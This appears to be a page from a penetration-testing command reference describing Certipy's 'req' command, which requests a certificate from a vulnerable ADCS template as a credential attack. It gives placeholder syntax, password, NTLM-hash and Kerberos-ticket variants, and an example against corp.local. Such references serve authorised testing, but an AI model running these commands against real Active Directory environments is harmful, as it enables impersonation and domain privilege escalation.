Certipy Request Certificate

Request a certificate from a vulnerable ADCS template

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <ip> -ca '<ca_name>' -template '<template>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

certipy req -u '<user>@<domain>' -hashes ':<hash>' -dc-ip <ip> -ca '<ca_name>' -template '<template>'

Kerberos Ticket requires Kerberos ticket

certipy req -u '<user>@<domain>' -k -no-pass -dc-ip <ip> -ca '<ca_name>' -template '<template>'

Examples

certipy req -u 'user@corp.local' -p 'password' -dc-ip 192.168.1.100 -ca 'CORP-CA' -template 'VulnTemplate'

Tags

certipy adcs certificate esc1 request